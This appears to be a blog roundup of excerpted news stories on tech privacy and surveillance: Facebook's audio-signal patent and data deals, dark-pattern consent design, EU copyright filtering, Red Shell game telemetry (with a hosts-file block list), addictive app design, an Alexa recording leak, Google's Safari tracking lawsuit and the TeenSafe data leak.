In addition to all the data users voluntarily give up, and the incidental data it collects through techniques like browser fingerprinting, Facebook would use this audio information to figure out which ads are most effective. For example, if a user walked away from the TV or changed the channel as soon as the ad began to play, it might consider the ad ineffective or on a subject the user doesn’t find interesting. If the user stays where they are and the audio is loud and clear, Facebook could compare that seemingly effective ad with your other data to make better suggestions for its advertising clients.

An example of a broadcasting device communicating with the network and identifying various users in a household.
Image: USPTO

Yes, this is creepy as hell and feels like someone trying to make a patent for a peephole on a nondescript painting

Source: Facebook Patent Imagines Triggering Your Phone’s Mic When a Hidden Signal Plays on TV

Facebook, Google, Microsoft scolded for tricking people into spilling their private info

Five consumer privacy groups have asked the European Data Protection Board to investigate how Facebook, Google, and Microsoft design their software to see whether it complies with the General Data Protection Regulation (GDPR).

Essentially, the tech giants are accused of crafting their user interfaces so that netizens are fooled into clicking away their privacy, and handing over their personal information.

In a letter sent today to chairwoman Andrea Jelinek, the BEUC (Bureau Européen des Unions de Consommateurs), the Norwegian Consumer Council (Forbrukerrådet), Consumers International, Privacy International and ANEC (just too damn long to spell out) contend that the three tech giants “employed numerous tricks and tactics to nudge or push consumers toward giving consent to sharing as much data for as many purposes as possible.”

The letter coincides with the publication of a Forbrukerrådet report, “Deceived By Design,” which claims that “tech companies use dark patterns to discourage us from exercising our rights to privacy.”

Dark patterns here refers to app interface design choices that attempt to influence users to do things they may not want to do because they benefit the software maker.

The report faults Google, Facebook and, to a lesser degree, Microsoft for employing default settings that dispense with privacy. It also says they use misleading language, give users an illusion of control, conceal pro-privacy choices, offer take-it-or-leave it choices and use design patterns that make it more laborious to choose privacy.

It argues that dark patterns deprive users of control, a central requirement under GDPR.

As an example of linguistic deception, the report cites Facebook text that seeks permission to use facial recognition on images:

If you keep face recognition turned off, we won’t be able to use this technology if a stranger uses your photo to impersonate you. If someone uses a screen reader, they won’t be told when you’re in a photo unless you’re tagged.

The way this is worded, the report says, pushes Facebook users to accept facial recognition by suggesting there’s a risk of impersonation if they refuse. And it implies there’s something unethical about depriving those forced to use screen readers of image descriptions, a practice known as “confirmshaming.”

Source: Facebook, Google, Microsoft scolded for tricking people into spilling their private info • The Register

EU breaks internet, starts wholesale censorship for rich man copyright holders

The problems are huge, not least because the EU will mandate an automated content filter, which means that memes will die. Worse, if you have the money to spam the system with takedown requests, you can kill basically any content you want, with the actual rights holder having only a marginal chance of navigating EU bureaucracy to reclaim their rights.

There goes free speech and innovation.


Source: COM_2016_0593_FIN.ENG.xhtml.1_EN_ACT_part1_v5.docx

Red Shell packaged games (Civ VI, Total War, ESO, KSP and more) contain a spyware which tracks your Internet activity outside of the game

Red Shell is spyware that tracks data on your PC and shares it with third parties. On their website they phrase it all in very harmless language, but the fact is that this is software from someone I don’t trust, which I never invited, and which is looking at my data and running on my PC against my will. This has no place in a full-price PC game – and in no game at all, if it were up to me.

I make this thread to raise awareness of these user-unfriendly marketing practices and data-mining tools that are common on the mobile market and are now flooding over to the PC games market. As a person and a gamer I refuse to be data-mined. My data is my own, and you have no business making money off it.

Yesterday’s announcement was only for “Holy Potatoes! We’re in Space?!”, but I would consider all their games at risk of containing that spyware if they choose to include it again, with or without an announcement. The publisher of this one title is Daedalic Entertainment, while the others are self-published, so it could be worth checking whether other Daedalic Entertainment games contain the spyware as well; I have not had time to do that.

Reddit [PSA] RED SHELL Spyware – “Holy Potatoes! We’re in Space?!” integrated and removed it after complaints

and
[PSA] Civ VI, Total War, ESO, KSP and more contain a spyware which tracks your Internet activity outside of the game (x-post r/Steam)

Addresses to block:
redshell.io
api.redshell.io
treasuredata.com
api.treasuredata.com
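One common way to act on that list is to null-route the domains at the OS level in the hosts file, so the game’s telemetry never resolves. A sketch (the path shown is the Linux/macOS location; on Windows it is `C:\Windows\System32\drivers\etc\hosts`):

```
# /etc/hosts — null-route the Red Shell / Treasure Data endpoints
0.0.0.0 redshell.io
0.0.0.0 api.redshell.io
0.0.0.0 treasuredata.com
0.0.0.0 api.treasuredata.com
```

Note this blocks the hostnames for everything on the machine, not just the games in question.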

EU Copyright law could put end to net memes

Memes, remixes and other user-generated content could disappear online if the EU’s proposed rules on copyright become law, warn experts.

Digital rights groups are campaigning against the Copyright Directive, which the European Parliament will vote on later this month.

The legislation aims to protect rights-holders in the internet age.

But critics say it misunderstands the way people engage with web content and risks excessive censorship.

The Copyright Directive is an attempt to reshape copyright for the internet, in particular rebalancing the relationship between copyright holders and online platforms.

Article 13 states that platform providers should “take measures to ensure the functioning of agreements concluded with rights-holders for the use of their works”.

Critics say this will, in effect, require all internet platforms to filter all content put online by users, which many believe would be an excessive restriction on free speech.

There is also concern that the proposals will rely on algorithms that will be programmed to “play safe” and delete anything that creates a risk for the platform.

A campaign against Article 13 – Copyright 4 Creativity – said that the proposals could “destroy the internet as we know it”.

“Should Article 13 of the Copyright Directive be adopted, it will impose widespread censorship of all the content you share online,” it said.

It is urging users to write to their MEP ahead of the vote on 20 June.

Jim Killock, executive director of the UK’s Open Rights Group, told the BBC: “Article 13 will create a ‘Robo-copyright’ regime, where machines zap anything they identify as breaking copyright rules, despite legal bans on laws that require ‘general monitoring’ of users to protect their privacy.

“Unfortunately, while machines can spot duplicate uploads of Beyonce songs, they can’t spot parodies, understand memes that use copyright images, or make any kind of cultural judgement about what creative people are doing. We see this all too often on YouTube already.

Source: Copyright law could put end to net memes – BBC News

Facebook gave some companies special access to data on users’ friends

Facebook granted a select group of companies special access to its users’ records even after 2015, the point at which the company claims it stopped sharing such data with app developers.

According to the Wall Street Journal, which cited court documents, unnamed Facebook officials and other unnamed sources, Facebook made special agreements with certain companies called “whitelists,” which gave them access to extra information about a user’s friends. This includes data such as phone numbers and “friend links,” which measure the degree of closeness between users and their friends.

These deals were made separately from the company’s data-sharing agreements with device manufacturers such as Huawei, which Facebook disclosed earlier this week after a New York Times report on the arrangement.

Source: Facebook gave some companies special access to data on users’ friends

The hits keep coming for Facebook: Web giant made 14m people’s private posts public

About 14 million people were affected by a bug that, for a nine-day span between May 18 and 27, caused profile posts to be set as public by default, allowing any Tom, Dick or Harriet to view the material.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” Facebook chief privacy officer Erin Egan said in a statement to The Register.

Source: The hits keep coming for Facebook: Web giant made 14m people’s private posts public • The Register

How programmers addict you to social media, games and your mobile phone

If you look at the current climate, the largest companies are the ones that hook you into their channel, whether it is a game, a website, shopping or social media. Quite a lot of research has been done into how much time we spend watching TV and looking at our mobiles, with differing but surprisingly high numbers: The New York Post says Americans check their phones 80 times per day, The Daily Mail says 110 times, Inc cites a study from Qualtrics and Accel with 150 times, and Business Insider has people touching their phones 2,617 times per day.

This is nurtured behaviour, and there is quite a bit of research into exactly how it is done:

Social Networking Sites and Addiction: Ten Lessons Learned (academic paper)
Online social networking sites (SNSs) have gained increasing popularity in the last decade, with individuals engaging in SNSs to connect with others who share similar interests. The perceived need to be online may result in compulsive use of SNSs, which in extreme cases may result in symptoms and consequences traditionally associated with substance-related addictions. In order to present new insights into online social networking and addiction, in this paper, 10 lessons learned concerning online social networking sites and addiction based on the insights derived from recent empirical research will be presented. These are: (i) social networking and social media use are not the same; (ii) social networking is eclectic; (iii) social networking is a way of being; (iv) individuals can become addicted to using social networking sites; (v) Facebook addiction is only one example of SNS addiction; (vi) fear of missing out (FOMO) may be part of SNS addiction; (vii) smartphone addiction may be part of SNS addiction; (viii) nomophobia may be part of SNS addiction; (ix) there are sociodemographic differences in SNS addiction; and (x) there are methodological problems with research to date. These are discussed in turn. Recommendations for research and clinical applications are provided.

Hooked: How to Build Habit-Forming Products (Book)
Why do some products capture widespread attention while others flop? What makes us engage with certain products out of sheer habit? Is there a pattern underlying how technologies hook us?

Nir Eyal answers these questions (and many more) by explaining the Hook Model—a four-step process embedded into the products of many successful companies to subtly encourage customer behavior. Through consecutive “hook cycles,” these products reach their ultimate goal of bringing users back again and again without depending on costly advertising or aggressive messaging.

7 Ways Facebook Keeps You Addicted (and how to apply the lessons to your products) (article)

One of the key reasons it is so addictive is “operant conditioning”. It is based upon the principle of variable rewards, discovered by B. F. Skinner (an early exponent of the school of behaviourism) in the 1930s while performing experiments with rats.

The secret?

Not rewarding all actions but only randomly.

Most of our emails are boring business emails and occasionally we find an enticing email that keeps us coming back for more. That’s variable reward.

That’s one way Facebook creates addiction
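The mechanism is simple enough to model in a few lines. This is a minimal sketch of a variable-ratio schedule, not anything from Facebook’s actual code; the 20% payoff rate is an arbitrary illustration:

```python
import random

def check_feed(p_reward=0.2, rng=random):
    """One 'pull of the lever' – checking the feed/inbox.
    Occasionally, and unpredictably, there is something enticing."""
    return "something new!" if rng.random() < p_reward else None

random.seed(0)
hits = sum(check_feed() is not None for _ in range(1000))
# Roughly one check in five pays off – but never predictably which one.
# That unpredictability, not the reward itself, is what drives re-checking.
print(hits)
```

A fixed schedule (say, a reward every fifth check exactly) would be learned and ignored; it is the randomness that keeps the behaviour going.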

The Secret Ways Social Media Is Built for Addiction

On February 9, 2009, Facebook introduced the Like button. Initially, the button was an innocent thing. It had nothing to do with hijacking the social reward systems of a user’s brain.

“The main intention I had was to make positivity the path of least resistance,” explains Justin Rosenstein, one of the four Facebook designers behind the button. “And I think it succeeded in its goals, but it also created large unintended negative side effects. In a way, it was too successful.”

Today, most of us reach for Snapchat, Instagram, Facebook, or Twitter with one vague hope in mind: maybe someone liked my stuff. And it’s this craving for validation, experienced by billions around the globe, that’s currently pushing platform engagement in ways that in 2009 were unimaginable. But more than that, it’s driving profits to levels that were previously impossible.

“The attention economy” is a relatively new term. It describes the supply and demand of a person’s attention, which is the commodity traded on the internet. The business model is simple: the more attention a platform can pull, the more effective its advertising space becomes, allowing it to charge advertisers more.

Behavioral Game Design (article)

Every computer game is designed around the same central element: the player. While the hardware and software for games may change, the psychology underlying how players learn and react to the game is a constant. The study of the mind has actually come up with quite a few findings that can inform game design, but most of these have been published in scientific journals and other esoteric formats inaccessible to designers. Ironically, many of these discoveries used simple computer games as tools to explore how people learn and act under different conditions.

The techniques that I’ll discuss in this article generally fall under the heading of behavioral psychology. Best known for the work done on animals in the field, behavioral psychology focuses on experiments and observable actions. One hallmark of behavioral research is that most of the major experimental discoveries are species-independent and can be found in anything from birds to fish to humans. What behavioral psychologists look for (and what will be our focus here) are general “rules” for learning and for how minds respond to their environment. Because of the species- and context-free nature of these rules, they can easily be applied to novel domains such as computer game design. Unlike game theory, which stresses how a player should react to a situation, this article will focus on how they really do react to certain stereotypical conditions.

What is being offered here is not a blueprint for perfect games, it is a primer to some of the basic ways people react to different patterns of rewards. Every computer game is implicitly asking its players to react in certain ways. Psychology can offer a framework and a vocabulary for understanding what we are already telling our players.

5 Creepy Ways Video Games Are Trying to Get You Addicted (article)

The Slot Machine in Your Pocket (brilliant article!)

When we get sucked into our smartphones or distracted, we think it’s just an accident and our responsibility. But it’s not. It’s also because smartphones and apps hijack our innate psychological biases and vulnerabilities.

I learned about our minds’ vulnerabilities when I was a magician. Magicians start by looking for blind spots, vulnerabilities and biases of people’s minds, so they can influence what people do without them even realizing it. Once you know how to push people’s buttons, you can play them like a piano. And this is exactly what technology does to your mind. App designers play your psychological vulnerabilities in the race to grab your attention.

I want to show you how they do it, and offer hope that we have an opportunity to demand a different future from technology companies.

If you’re an app, how do you keep people hooked? Turn yourself into a slot machine.

There is also a backlash against this movement:

How Technology is Hijacking Your Mind — from a Magician and Google Design Ethicist

I’m an expert on how technology hijacks our psychological vulnerabilities. That’s why I spent the last three years as a Design Ethicist at Google caring about how to design things in a way that defends a billion people’s minds from getting hijacked.

Humantech.com

Technology is hijacking our minds and society.

Our world-class team of deeply concerned former tech insiders and CEOs intimately understands the culture, business incentives, design techniques, and organizational structures driving how technology hijacks our minds.

Since 2013, we’ve raised awareness of the problem within tech companies and for millions of people through broad media attention, convened top industry executives, and advised political leaders. Building on this start, we are advancing thoughtful solutions to change the system.

Why is this problem so urgent?

Technology that tears apart our common reality and truth, constantly shreds our attention, or causes us to feel isolated makes it impossible to solve the world’s other pressing problems like climate change, poverty, and polarization.

No one wants technology like that. Which means we’re all actually on the same team: Team Humanity, to realign technology with humanity’s best interests.

What is Time Well Spent (Part I): Design Distinctions

With Time Well Spent, we want technology that cares about helping us spend our time, and our lives, well – not seducing us into the most screen time, always-on interruptions or distractions.

So, people ask, “Are you saying that you know how people should spend their time?” Of course not. Let’s first establish what Time Well Spent isn’t:

It is not a universal, normative view of how people should spend their time
It is not saying that screen time is bad, or that we should turn it all off.
It is not saying that specific categories of apps (like social media or games) are bad.

You know that silly fear about Alexa recording everything and leaking it online? It just happened

It’s time to break out your “Alexa, I Told You So” banners – because a Portland, Oregon, couple received a phone call from one of the husband’s employees earlier this month, telling them she had just received a recording of them talking privately in their home.

“Unplug your Alexa devices right now,” the staffer told the couple, who did not wish to be fully identified, “you’re being hacked.”

At first the couple thought it might be a hoax call. However, the employee – over a hundred miles away in Seattle – confirmed the leak by revealing the pair had just been talking about their hardwood floors.

The recording had been sent from the couple’s Alexa-powered Amazon Echo to the phone of one of the husband’s employees, whose number was in his contacts list; she forwarded the audio to the wife, Danielle, who was amazed to hear herself talking about their floors. Suffice to say, this episode was unexpected: the couple had not instructed Alexa to send a copy of their conversation to anyone.

[…]

According to Danielle, Amazon confirmed that it was the voice-activated digital assistant that had recorded and sent the file to a virtual stranger, and apologized profusely, but gave no explanation for how it may have happened.

“They said ‘our engineers went through your logs, and they saw exactly what you told us, they saw exactly what you said happened, and we’re sorry.’ He apologized like 15 times in a matter of 30 minutes and he said we really appreciate you bringing this to our attention, this is something we need to fix!”

She said she’d asked for a refund for all their Alexa devices – something the company has so far demurred from agreeing to.

Alexa, what happened? Sorry, I can’t respond to that right now

We asked Amazon for an explanation, and today the US giant responded confirming its software screwed up:

Amazon takes privacy very seriously. We investigated what happened and determined this was an extremely rare occurrence. We are taking steps to avoid this from happening in the future.

For this to happen, something has gone very seriously wrong with the Alexa device’s programming.

The machines are designed to constantly listen out for the “Alexa” wake word, filling a one-second audio buffer from its microphone at all times in anticipation of a command. When the wake word is detected in the buffer, it records what is said until there is a gap in the conversation, and sends the audio to Amazon’s cloud system to transcribe, figure out what needs to be done, and respond to it.
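The always-on loop described above can be sketched as a rolling buffer plus a keyword classifier. The sample rate, buffer size and detector below are assumptions; Amazon’s real on-device classifier is proprietary:

```python
from collections import deque

SAMPLE_RATE = 16_000                  # assumed on-device audio rate
ring = deque(maxlen=SAMPLE_RATE)      # rolling one-second audio buffer

def detect_wake_word(buffer) -> bool:
    """Placeholder for the on-device 'Alexa' keyword classifier."""
    return False                      # hypothetical stub

def record_and_send_to_cloud():
    """Placeholder: record until a gap in speech, then upload the clip
    for transcription and intent handling."""
    pass

def on_audio_chunk(chunk):
    ring.extend(chunk)                # newest samples evict the oldest
    if detect_wake_word(ring):
        record_and_send_to_cloud()

# Feeding three seconds of audio never grows the buffer past one second:
for _ in range(3):
    on_audio_chunk([0.0] * SAMPLE_RATE)
print(len(ring) == SAMPLE_RATE)       # → True
```

The key point: nothing leaves the device until the classifier fires – which is exactly why a false positive on the wake word is the failure mode that matters.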

[…]

A spokesperson for Amazon has been in touch with more details on what happened during the Alexa Echo blunder, at least from their point of view. We’re told the device misheard its wake-up word while overhearing the couple’s private chat, started processing talk of wood floorings as commands, and it all went downhill from there. Here is Amazon’s explanation:

The Echo woke up due to a word in background conversation sounding like “Alexa.” Then, the subsequent conversation was heard as a “send message” request. At which point, Alexa said out loud “To whom?” At which point, the background conversation was interpreted as a name in the customers contact list. Alexa then asked out loud, “[contact name], right?” Alexa then interpreted background conversation as “right.” As unlikely as this string of events is, we are evaluating options to make this case even less likely.
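Amazon’s chain of events is easiest to see as a tiny dialogue state machine: each step needs only one (mis)heard phrase, so overheard background chat can walk all the way to “send”. The states, intent keywords and names below are invented for illustration:

```python
def alexa_dialogue(heard):
    """`heard` is the sequence of phrases the device (mis)recognises.
    Returns the list of recipients a message actually got sent to."""
    state, recipient, outbox = "idle", None, []
    for phrase in heard:
        if state == "idle" and "alexa" in phrase:
            state = "awake"                       # wake word (mis)heard
        elif state == "awake" and "send message" in phrase:
            state = "ask_recipient"               # device says "To whom?"
        elif state == "ask_recipient":
            recipient, state = phrase, "confirm"  # device says "<name>, right?"
        elif state == "confirm" and "right" in phrase:
            outbox.append(recipient)              # message goes out
            state = "idle"
    return outbox

# Four misheard fragments of background conversation are enough to send:
print(alexa_dialogue(["alexa?", "…send message…", "john", "right"]))  # → ['john']
```

Each transition individually looks like a reasonable confirmation step; it is the low bar at every step, compounded, that lets a private conversation trigger the whole chain.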

Source: You know that silly fear about Alexa recording everything and leaking it online? It just happened • The Register

Google sued for ‘clandestine tracking’ of 4.4m UK iPhone users’ browsing data

Google is being sued in the high court for as much as £3.2bn for the alleged “clandestine tracking and collation” of personal information from 4.4 million iPhone users in the UK.

The collective action is being led by former Which? director Richard Lloyd over claims Google bypassed the privacy settings of Apple’s Safari browser on iPhones between August 2011 and February 2012 in order to divide people into categories for advertisers.

At the opening of an expected two-day hearing in London on Monday, lawyers for Lloyd’s campaign group Google You Owe Us told the court that the information collected by Google included race, physical and mental health, political leanings, sexuality, social class, financial data, shopping habits and location data.

Hugh Tomlinson QC, representing Lloyd, said information was then “aggregated” and users were put into groups such as “football lovers” or “current affairs enthusiasts” for the targeting of advertising.

Tomlinson said the data was gathered through “clandestine tracking and collation” of browsing on the iPhone, known as the “Safari Workaround” – an activity he said was exposed by a PhD researcher in 2012. Tomlinson said Google has already paid $39.5m to settle claims in the US relating to the practice. Google was fined $22.5m for the practice by the US Federal Trade Commission in 2012 and forced to pay $17m to 37 US states.

Speaking ahead of the hearing, Lloyd said: “I believe that what Google did was quite simply against the law.

“Their actions have affected millions in England and Wales and we’ll be asking the judge to ensure they are held to account in our courts.”

The campaign group hopes to win at least £1bn in compensation for an estimated 4.4 million iPhone users. Court filings show Google You Owe Us could be seeking as much as £3.2bn, meaning claimants could receive £750 per individual if successful.

Google contends the type of “representative action” being brought against it by Lloyd is unsuitable and should not go ahead. The company’s lawyers said there is no suggestion the Safari Workaround resulted in any information being disclosed to third parties.

Source: Google sued for ‘clandestine tracking’ of 4.4m UK iPhone users’ browsing data | Technology | The Guardian

Note: Google does not contest the Safari Workaround though

Teensafe spying app leaked thousands of user passwords

At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.

The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.

Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.

But the Los Angeles, Calif.-based company left its servers, hosted on Amazon’s cloud, unprotected and accessible by anyone without a password.

Source: Teen phone monitoring app leaked thousands of user passwords | ZDNet

Which basically means that, beyond nasty parents spying on their children, anyone else could do so too.